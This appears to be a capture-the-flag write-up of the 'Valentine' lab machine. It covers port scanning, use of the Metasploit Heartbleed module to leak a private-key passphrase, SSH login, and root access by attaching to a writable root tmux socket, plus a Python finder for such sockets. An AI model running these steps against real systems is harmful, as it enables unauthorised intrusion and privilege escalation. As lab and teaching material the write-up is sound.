Recon
No domain this time.
$nmap -p- -A 10.129.168.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 09:20 UTC
Nmap scan report for 10.129.168.63
Host is up (0.053s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: 2024-10-12T09:20:50+00:00; -5s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The stack dates the host: OpenSSH 5.9p1 and Apache 2.2.22 are Ubuntu 12.04, whose OpenSSL 1.0.1 is the Heartbleed generation, and the certificate has been expired since February 2019. Rerunning nmap with --script vuln against 443 confirms it: the ssl-heartbleed script reports the server vulnerable to CVE-2014-0160, so we have a memory-disclosure primitive to come back to.
dirsearch -u http://10.129.168.63/
[09:22:48] 403 - 243B - /.ht_wsr.txt
[09:22:48] 403 - 243B - /.htaccess.sample
[09:22:48] 403 - 243B - /.htaccess_orig
[09:22:48] 403 - 242B - /.htaccess_sc
[09:22:48] 403 - 241B - /.htaccessBAK
[09:22:48] 403 - 241B - /.htaccessOLD2
[09:22:48] 403 - 242B - /.htaccess.bak1
[09:22:48] 403 - 242B - /.htaccess.orig
[09:22:48] 403 - 244B - /.htaccess_extra
[09:22:48] 403 - 241B - /.htaccessOLD
[09:22:48] 403 - 241B - /.htaccess.save
[09:22:49] 403 - 237B - /.htm
[09:22:49] 403 - 237B - /.html
[09:22:49] 403 - 246B - /.htpasswd_test
[09:22:49] 403 - 241B - /.htpasswds
[09:22:49] 403 - 241B - /.httr-oauth
[09:22:59] 403 - 241B - /cgi-bin/
[09:23:03] 301 - 245B - /dev -> http://10.129.168.63/dev/ (!)
[09:23:03] 200 - 493B - /dev/
[09:23:03] 403 - 237B - /doc/
[09:23:03] 403 - 244B - /doc/stable.version
[09:23:03] 403 - 245B - /doc/html/index.html
[09:23:03] 403 - 240B - /doc/api/
[09:23:03] 403 - 247B - /doc/en/changes.html
[09:23:16] 403 - 240B - /server-status/
[09:23:16] 403 - 240B - /server-status
Everything except /dev/ is a 403. /dev/ holds two files. notes.txt:
To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
So the encoder/decoder the notes refer to still does its work server-side, which is the hint the box is giving: whatever anyone submits to it passes through the web server's memory.
The second file in /dev/, hype_key, is a blob of hex:
Decoding it from hex in CyberChef gives a passphrase-protected RSA private key:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
[key body omitted]
-----END RSA PRIVATE KEY-----
Trying to log in with this key, ssh prompts for the key's passphrase, which we don't have; the Proc-Type/DEK-Info headers confirm the key is encrypted (AES-128-CBC), and it is not going to yield to a wordlist quickly. Heartbleed, on the other hand, leaks up to 64 KB of the httpd process memory per request, and on a server hosting a form that posts to a server-side decoder that memory can contain whatever was submitted recently. Let's try that.
Running the Metasploit module auxiliary/scanner/ssl/openssl_heartbleed with set ACTION DUMP (run it a few times, each reply is a different slice of the heap) we get:
The dump contains a base64 string; decoding it gives: heartbleedbelievethehype.
Now we can log in over ssh as hype with the key and that passphrase:
chmod 600 hype_key
ssh -i hype_key hype@10.129.168.63
One thing that is client-config specific: the key is RSA and this OpenSSH 5.9 server only speaks ssh-rsa (RSA with SHA-1; rsa-sha2-* only arrived in OpenSSH 7.2), which OpenSSH clients from 8.8 onwards disable by default, so the login fails until it is re-enabled. Scope the exception to this host rather than Host *, so the weak algorithm is not turned back on for every server you connect to; add to ~/.ssh/config:
Host 10.129.168.63
    PubkeyAcceptedKeyTypes=+ssh-rsa
    HostKeyAlgorithms=+ssh-rsa
We are in.
Priv esc
Running LinEnum shows that hype's shell history (~/.bash_history) has survived and is readable:
exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
Running tmux -S /.devs/dev_sess attaches to the tmux server listening on that socket rather than the default one under /tmp/tmux-<uid>/. That server was started by root and is still running, so the shell inside the session is root. Nice.
The precondition worth checking before attaching (ls -la /.devs, then tmux -S /.devs/dev_sess ls to see the sessions) is that the socket is writable by hype: connecting to a unix socket requires write permission on it, and tmux's default socket directory is created 0700 precisely to stop other users doing this.
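The same idea as a reusable check (added example, not from the original notes and not part of LinEnum): walk a few directories for unix sockets owned by someone else that our uid can still write to, since writing to the socket inode is what connecting requires, then ask tmux whether a server answers behind each one. A root-owned socket a non-root user can reach, as /.devs/dev_sess turned out to be, is exactly what this flags. ROOTS and the temp-socket demo are assumptions/constructed.

```python
#!/usr/bin/env python3
"""Find tmux/screen-style unix sockets another user left attachable. Added example for
this writeup, not from the original notes. It generalises the /.devs/dev_sess finding:
a unix socket can be connected to by anyone who can write to its inode, so a root-owned
socket with a lax mode hands out root's session. ROOTS and the demo are assumptions."""
import os
import socket
import stat
import subprocess
import tempfile

ROOTS = ("/", "/tmp", "/run", "/var/run", "/home")    # shallow walk; /.devs on Valentine sits under /
SKIP = {"/proc", "/sys", "/dev"}

def can_write(st: os.stat_result, uid: int, gids) -> bool:
    """Plain owner/group/other write check (ignores POSIX ACLs and capabilities)."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def find_attachable_sockets(roots=ROOTS, uid=None, gids=None, max_depth=2):
    """[(path, owner_uid, mode)] for sockets not owned by uid that uid can still write to."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    hits = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
            rel = os.path.relpath(dirpath, root)
            if rel != "." and rel.count(os.sep) + 1 >= max_depth:
                dirnames[:] = []                          # stop descending
            dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP]
            for name in filenames:                        # os.walk lists sockets as "files"
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISSOCK(st.st_mode) and st.st_uid != uid and can_write(st, uid, gids):
                    hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return hits

def tmux_sessions(sock_path: str):
    """Sessions behind a socket according to tmux itself; [] if no live tmux server answers."""
    try:
        r = subprocess.run(["tmux", "-S", sock_path, "list-sessions"],
                           capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return []
    return r.stdout.splitlines() if r.returncode == 0 else []

def demo():
    """Constructed check: bind a throwaway socket in a temp dir and look at it as a different,
    group-member uid. Group-writable (0770) is found; owner-only (0700) is not."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "dev_sess")
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(path)                                      # creates the socket inode
        s.close()                                         # inode stays until unlinked
        st = os.lstat(path)
        other_uid, shared_gids = st.st_uid + 1, {st.st_gid}
        for label, mode in (("group_writable", 0o770), ("owner_only", 0o700)):
            os.chmod(path, mode)
            results[label] = find_attachable_sockets([tmp], uid=other_uid, gids=shared_gids)
    return results

if __name__ == "__main__":
    for path, owner, mode in find_attachable_sockets():
        sessions = tmux_sessions(path)
        print(f"{path}  owner={'root' if owner == 0 else owner}  mode={mode:04o}  "
              f"tmux={', '.join(sessions) if sessions else 'no server'}")
```

Run as hype this would list /.devs/dev_sess with owner root, and tmux_sessions() shows what is attached before you connect. On the defensive side, tmux's default socket directory /tmp/tmux-<uid> is created 0700 for exactly this reason; pointing a root tmux at a shared path with -S and a lax mode throws that protection away.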